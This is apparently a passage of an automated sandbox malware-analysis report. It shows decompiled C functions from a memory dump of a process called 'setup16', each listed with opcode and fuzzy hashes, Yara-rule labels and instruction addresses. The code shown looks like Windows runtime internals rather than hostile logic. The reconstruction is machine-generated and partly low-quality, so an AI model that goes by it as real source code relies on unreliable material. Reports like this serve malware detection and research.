                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: e3024de1b3cc4d2155e140e6556b59b95fe5b7bf3057896fc944b8c7892a8957
                                                                                                                                                                                                        • Instruction ID: 27d6b3a5895c1084805dc950d6d969d35fdc7bd061a78591b3d0ae93f8badc80
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e3024de1b3cc4d2155e140e6556b59b95fe5b7bf3057896fc944b8c7892a8957
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7031C0766057919BD321DF68C940A6EB3E9FFC8700F044A29F89587690E730F904CBA6
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 049EC182 Relevance: .1, Instructions: 104COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 68%
                                                                                                                                                                                                        			E049EC182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E049E7D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E04A98D34(_v8, _t80);
					}
					E049E2280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E049DFFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E04A98833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E049DFFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E04A0B180();
						if(_a4 != 0) {
							E049E2280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E049EBB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E049EBB2D(_t16, _t15);
						E049EB944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E049DFFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E049DFFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E049DFFB0(0, __ecx, _t24);
				}
				return 0;
			}
















                                                                                                                                                                                                        0x049ec18d
                                                                                                                                                                                                        0x049ec18f
                                                                                                                                                                                                        0x049ec191
                                                                                                                                                                                                        0x049ec19b
                                                                                                                                                                                                        0x049ec1a0
                                                                                                                                                                                                        0x049ec1d4
                                                                                                                                                                                                        0x049ec1de
                                                                                                                                                                                                        0x04a32d6e
                                                                                                                                                                                                        0x049ec1e4
                                                                                                                                                                                                        0x049ec1e4
                                                                                                                                                                                                        0x049ec1e4
                                                                                                                                                                                                        0x049ec1ec
                                                                                                                                                                                                        0x04a32d7d
                                                                                                                                                                                                        0x04a32d7d
                                                                                                                                                                                                        0x049ec1f3
                                                                                                                                                                                                        0x049ec1ff
                                                                                                                                                                                                        0x04a32d88
                                                                                                                                                                                                        0x04a32d8d
                                                                                                                                                                                                        0x04a32d94
                                                                                                                                                                                                        0x04a32d94
                                                                                                                                                                                                        0x04a32d9f
                                                                                                                                                                                                        0x04a32da4
                                                                                                                                                                                                        0x04a32dab
                                                                                                                                                                                                        0x04a32db0
                                                                                                                                                                                                        0x04a32db2
                                                                                                                                                                                                        0x04a32db3
                                                                                                                                                                                                        0x04a32db4
                                                                                                                                                                                                        0x04a32dbc
                                                                                                                                                                                                        0x04a32dc3
                                                                                                                                                                                                        0x04a32dc3
                                                                                                                                                                                                        0x049ec205
                                                                                                                                                                                                        0x049ec205
                                                                                                                                                                                                        0x049ec208
                                                                                                                                                                                                        0x049ec20e
                                                                                                                                                                                                        0x049ec211
                                                                                                                                                                                                        0x049ec216
                                                                                                                                                                                                        0x049ec219
                                                                                                                                                                                                        0x049ec21f
                                                                                                                                                                                                        0x049ec222
                                                                                                                                                                                                        0x049ec22c
                                                                                                                                                                                                        0x049ec234
                                                                                                                                                                                                        0x049ec23a
                                                                                                                                                                                                        0x049ec23f
                                                                                                                                                                                                        0x049ec245
                                                                                                                                                                                                        0x049ec24b
                                                                                                                                                                                                        0x049ec251
                                                                                                                                                                                                        0x049ec25a
                                                                                                                                                                                                        0x049ec276
                                                                                                                                                                                                        0x049ec27d
                                                                                                                                                                                                        0x049ec27d
                                                                                                                                                                                                        0x049ec25c
                                                                                                                                                                                                        0x049ec25c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049ec25e
                                                                                                                                                                                                        0x049ec1a4
                                                                                                                                                                                                        0x049ec1aa
                                                                                                                                                                                                        0x049ec1b3
                                                                                                                                                                                                        0x049ec265
                                                                                                                                                                                                        0x049ec26c
                                                                                                                                                                                                        0x049ec26c
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                                                                                                                                                                        • Instruction ID: d528b6e62cbae978c43ddfc958264c7136f2884dc1dff154dfe6f6b5046b6289
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1F314872701546BEE70AEBB5C480BF9FB98BF82308F08817AD41847341DB35BA05D7A1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 049FA70E Relevance: .1, Instructions: 96COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 92%
                                                                                                                                                                                                        			E049FA70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x4ab7b10; // 0x10
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x4ab7b10 = 8;
					 *0x4ab7b14 = 0x4ab7b0c;
					 *0x4ab7b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x11
					E049FA990(0x4ab7b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L049FA840(__edx, __ecx, __ecx, _t52, 0x4ab7b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x4ab7b10; // 0x10
					_t3 = _t37 + 0x27; // 0x37
					__eflags = _t3 >> 5 -  *0x4ab7b18; // 0x1
					if(__eflags > 0) {
						_t38 =  *0x4ab7b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x37
						_v8 = _t4 >> 5;
						_t50 = L049E4620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x4ab7b18 = _v8;
						_t8 = _t52 + 7; // 0x17
						E04A0F3E0(_t50,  *0x4ab7b14, _t8 >> 3);
						_t28 =  *0x4ab7b14; // 0x77577b0c
						__eflags = _t28 - 0x4ab7b0c;
						if(_t28 != 0x4ab7b0c) {
							L049E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x18
						 *0x4ab7b14 = _t50;
						_t48 = _v12;
						 *0x4ab7b10 = _t9;
						goto L6;
					}
					 *0x4ab7b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}
















                                                                                                                                                                                                        0x049fa713
                                                                                                                                                                                                        0x049fa714
                                                                                                                                                                                                        0x049fa717
                                                                                                                                                                                                        0x049fa71d
                                                                                                                                                                                                        0x049fa720
                                                                                                                                                                                                        0x049fa722
                                                                                                                                                                                                        0x049fa727
                                                                                                                                                                                                        0x049fa74a
                                                                                                                                                                                                        0x049fa754
                                                                                                                                                                                                        0x049fa75e
                                                                                                                                                                                                        0x049fa768
                                                                                                                                                                                                        0x049fa76a
                                                                                                                                                                                                        0x049fa773
                                                                                                                                                                                                        0x049fa78b
                                                                                                                                                                                                        0x049fa790
                                                                                                                                                                                                        0x049fa792
                                                                                                                                                                                                        0x049fa741
                                                                                                                                                                                                        0x049fa741
                                                                                                                                                                                                        0x049fa743
                                                                                                                                                                                                        0x049fa749
                                                                                                                                                                                                        0x049fa749
                                                                                                                                                                                                        0x049fa732
                                                                                                                                                                                                        0x049fa73a
                                                                                                                                                                                                        0x049fa797
                                                                                                                                                                                                        0x049fa79d
                                                                                                                                                                                                        0x049fa7a3
                                                                                                                                                                                                        0x049fa7a9
                                                                                                                                                                                                        0x049fa7b6
                                                                                                                                                                                                        0x049fa7bc
                                                                                                                                                                                                        0x049fa7ca
                                                                                                                                                                                                        0x049fa7e0
                                                                                                                                                                                                        0x049fa7e2
                                                                                                                                                                                                        0x049fa7e4
                                                                                                                                                                                                        0x04a39bf2
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a39bf2
                                                                                                                                                                                                        0x049fa7ed
                                                                                                                                                                                                        0x049fa7f2
                                                                                                                                                                                                        0x049fa800
                                                                                                                                                                                                        0x049fa805
                                                                                                                                                                                                        0x049fa80d
                                                                                                                                                                                                        0x049fa812
                                                                                                                                                                                                        0x04a39c08
                                                                                                                                                                                                        0x04a39c08
                                                                                                                                                                                                        0x049fa818
                                                                                                                                                                                                        0x049fa81b
                                                                                                                                                                                                        0x049fa821
                                                                                                                                                                                                        0x049fa824
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049fa824
                                                                                                                                                                                                        0x049fa7ae
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049fa7ae
                                                                                                                                                                                                        0x049fa73c
                                                                                                                                                                                                        0x049fa73e
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: d1457560a893fbeaa34843a3007838aaebafc624480f4c8de69e01a81cb38344
                                                                                                                                                                                                        • Instruction ID: d967a505d22ba3cc903776d6d16855d61a0d7c698fa35c00a003f9504aaa1fa1
                                                                                                                                                                                                        • Opcode Fuzzy Hash: d1457560a893fbeaa34843a3007838aaebafc624480f4c8de69e01a81cb38344
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0A319CB96206009BD715CB08DC81F6A77B9EBE4710F14496AE10A97661E2B4AD02DFD1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 049F61A0 Relevance: .1, Instructions: 93COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 97%
                                                                                                                                                                                                        			E049F61A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E049F5E50(0x49a67cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E04A99D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E049CF7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}



















                                                                                                                                                                                                        0x049f61b3
                                                                                                                                                                                                        0x049f61b5
                                                                                                                                                                                                        0x049f61bd
                                                                                                                                                                                                        0x049f61c3
                                                                                                                                                                                                        0x049f61c7
                                                                                                                                                                                                        0x049f61d2
                                                                                                                                                                                                        0x049f61ff
                                                                                                                                                                                                        0x049f61ff
                                                                                                                                                                                                        0x049f6201
                                                                                                                                                                                                        0x049f6207
                                                                                                                                                                                                        0x049f6207
                                                                                                                                                                                                        0x049f61d4
                                                                                                                                                                                                        0x049f61d9
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f61df
                                                                                                                                                                                                        0x049f61e2
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f61e6
                                                                                                                                                                                                        0x049f61e8
                                                                                                                                                                                                        0x049f61ee
                                                                                                                                                                                                        0x049f61ee
                                                                                                                                                                                                        0x049f61f9
                                                                                                                                                                                                        0x04a3762f
                                                                                                                                                                                                        0x04a37632
                                                                                                                                                                                                        0x04a37635
                                                                                                                                                                                                        0x04a37639
                                                                                                                                                                                                        0x04a37640
                                                                                                                                                                                                        0x04a3766e
                                                                                                                                                                                                        0x04a37675
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a37681
                                                                                                                                                                                                        0x04a37689
                                                                                                                                                                                                        0x04a3768d
                                                                                                                                                                                                        0x04a37691
                                                                                                                                                                                                        0x04a37695
                                                                                                                                                                                                        0x04a37699
                                                                                                                                                                                                        0x04a376af
                                                                                                                                                                                                        0x04a376b5
                                                                                                                                                                                                        0x04a376b7
                                                                                                                                                                                                        0x04a376b7
                                                                                                                                                                                                        0x04a376d7
                                                                                                                                                                                                        0x04a376dc
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a376dc
                                                                                                                                                                                                        0x04a376a2
                                                                                                                                                                                                        0x04a376a9
                                                                                                                                                                                                        0x04a37651
                                                                                                                                                                                                        0x04a37653
                                                                                                                                                                                                        0x04a37653
                                                                                                                                                                                                        0x04a37656
                                                                                                                                                                                                        0x04a37656
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a37656
                                                                                                                                                                                                        0x04a37644
                                                                                                                                                                                                        0x04a37646
                                                                                                                                                                                                        0x04a37648
                                                                                                                                                                                                        0x04a37648
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 2460629f05ca51858ede546b83975ac8ec79b62607a2ed5583580e20feb97211
                                                                                                                                                                                                        • Instruction ID: 86098e11e19f20bd993e32f22466ead141fae36a0d385823485dedbc25089402
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2460629f05ca51858ede546b83975ac8ec79b62607a2ed5583580e20feb97211
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 223136B16197019FD360DF19C950B2AB7E9EB88B10F05896DF9989B251E7B0F804CB91
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 049CAA16 Relevance: .1, Instructions: 93COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 95%
                                                                                                                                                                                                        			E049CAA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x4abd360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x4ab7b9c; // 0x0
					_t53 = L049E4620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E04A0B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E04A0F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L049D6C59(_t53, _t51, _t58) != 0) {
							_t28 = E049F5E50(0x49ac338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E049FB230(_v32, _v28, 0x49ac2d8, 1,  &_v24);
								_t28 = E049CF7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L049E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}




















                                                                                                                                                                                                        0x049caa25
                                                                                                                                                                                                        0x049caa29
                                                                                                                                                                                                        0x049caa2d
                                                                                                                                                                                                        0x049caa30
                                                                                                                                                                                                        0x049caa37
                                                                                                                                                                                                        0x049caa3c
                                                                                                                                                                                                        0x04a24458
                                                                                                                                                                                                        0x04a24458
                                                                                                                                                                                                        0x04a24472
                                                                                                                                                                                                        0x04a24474
                                                                                                                                                                                                        0x04a24476
                                                                                                                                                                                                        0x049caa64
                                                                                                                                                                                                        0x049caa74
                                                                                                                                                                                                        0x04a2447c
                                                                                                                                                                                                        0x04a24483
                                                                                                                                                                                                        0x04a24492
                                                                                                                                                                                                        0x049caa52
                                                                                                                                                                                                        0x049caa54
                                                                                                                                                                                                        0x049caa5e
                                                                                                                                                                                                        0x04a244a8
                                                                                                                                                                                                        0x04a244ad
                                                                                                                                                                                                        0x04a244af
                                                                                                                                                                                                        0x04a244b6
                                                                                                                                                                                                        0x04a244b6
                                                                                                                                                                                                        0x04a244b9
                                                                                                                                                                                                        0x04a244bc
                                                                                                                                                                                                        0x04a244cd
                                                                                                                                                                                                        0x04a244d3
                                                                                                                                                                                                        0x04a244d6
                                                                                                                                                                                                        0x04a244e1
                                                                                                                                                                                                        0x04a244e1
                                                                                                                                                                                                        0x04a244e6
                                                                                                                                                                                                        0x04a244e8
                                                                                                                                                                                                        0x04a244fb
                                                                                                                                                                                                        0x04a244fb
                                                                                                                                                                                                        0x04a244e8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049caa5e
                                                                                                                                                                                                        0x04a24476
                                                                                                                                                                                                        0x049caa42
                                                                                                                                                                                                        0x049caa46
                                                                                                                                                                                                        0x049caa48
                                                                                                                                                                                                        0x049caa4c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: dd597640df1398377db70c6c991c065f7c15e657d30500ecf9f18358c6c0c789
                                                                                                                                                                                                        • Instruction ID: 0edab0dbaf713c1d991039bbdf95033e39ac41781c83f3d161b1faedfb09ec04
                                                                                                                                                                                                        • Opcode Fuzzy Hash: dd597640df1398377db70c6c991c065f7c15e657d30500ecf9f18358c6c0c789
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3831E071A00629AFDB119FA8CE41ABEB3B9EF48704B014479F901EB140E774B911DBA1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A08EC7 Relevance: .1, Instructions: 92COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                                        			E04A08EC7(void* __ecx, void* __edx) {
				signed int _v8;
				signed int* _v16;
				intOrPtr _v20;
				signed int* _v24;
				char* _v28;
				signed int* _v32;
				intOrPtr _v36;
				signed int* _v40;
				signed int* _v44;
				signed int* _v48;
				intOrPtr _v52;
				signed int* _v56;
				signed int* _v60;
				signed int* _v64;
				intOrPtr _v68;
				signed int* _v72;
				char* _v76;
				signed int* _v80;
				signed int _v84;
				signed int* _v88;
				intOrPtr _v92;
				signed int* _v96;
				intOrPtr _v100;
				signed int* _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				signed int* _v152;
				char _v156;
				signed int* _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x4abd360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E049F4E70(0x4ab86e4, 0x4a09490, 0, 0);
					if( *0x4ab53e8 > 5 && E04A08F33(0x4ab53e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x4ab53e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x4ab53e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x49abc46;
						_t48 = E04A47B9C(0x4ab53e8, 0x49abc46, _t67, 0x4ab53e8, _t70,  &_v140);
					}
				}
				return E04A0B640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}











































                                                                                                                                                                                                        0x04a08ec7
                                                                                                                                                                                                        0x04a08ed9
                                                                                                                                                                                                        0x04a08edc
                                                                                                                                                                                                        0x04a08ee6
                                                                                                                                                                                                        0x04a08ee9
                                                                                                                                                                                                        0x04a08eee
                                                                                                                                                                                                        0x04a08efc
                                                                                                                                                                                                        0x04a08f08
                                                                                                                                                                                                        0x04a41349
                                                                                                                                                                                                        0x04a41353
                                                                                                                                                                                                        0x04a4135d
                                                                                                                                                                                                        0x04a41366
                                                                                                                                                                                                        0x04a4136f
                                                                                                                                                                                                        0x04a41375
                                                                                                                                                                                                        0x04a4137c
                                                                                                                                                                                                        0x04a41385
                                                                                                                                                                                                        0x04a41390
                                                                                                                                                                                                        0x04a41391
                                                                                                                                                                                                        0x04a4139c
                                                                                                                                                                                                        0x04a4139d
                                                                                                                                                                                                        0x04a413a6
                                                                                                                                                                                                        0x04a413ac
                                                                                                                                                                                                        0x04a413b2
                                                                                                                                                                                                        0x04a413b5
                                                                                                                                                                                                        0x04a413bc
                                                                                                                                                                                                        0x04a413bf
                                                                                                                                                                                                        0x04a413c2
                                                                                                                                                                                                        0x04a413c5
                                                                                                                                                                                                        0x04a413c8
                                                                                                                                                                                                        0x04a413cb
                                                                                                                                                                                                        0x04a413ce
                                                                                                                                                                                                        0x04a413d1
                                                                                                                                                                                                        0x04a413d4
                                                                                                                                                                                                        0x04a413d7
                                                                                                                                                                                                        0x04a413da
                                                                                                                                                                                                        0x04a413dd
                                                                                                                                                                                                        0x04a413e0
                                                                                                                                                                                                        0x04a413e3
                                                                                                                                                                                                        0x04a413e6
                                                                                                                                                                                                        0x04a413e9
                                                                                                                                                                                                        0x04a413f6
                                                                                                                                                                                                        0x04a41400
                                                                                                                                                                                                        0x04a41400
                                                                                                                                                                                                        0x04a08f08
                                                                                                                                                                                                        0x04a08f32

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 2b17269d1db5aabbf6773c88b39b1c51d15378e0a0980938dd11060dba74c225
                                                                                                                                                                                                        • Instruction ID: be3ec2b1719dcfb2884328d423b65da0bfc7cf9a8c2891f05f26d95ba92b5782
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2b17269d1db5aabbf6773c88b39b1c51d15378e0a0980938dd11060dba74c225
                                                                                                                                                                                                        • Instruction Fuzzy Hash: CE4191B1D00318ABDB10DFAAD980AEDFBF8FB48314F5081AEE559A7241E7746A45CF50
                                                                                                                                                                                                        Uniqueness

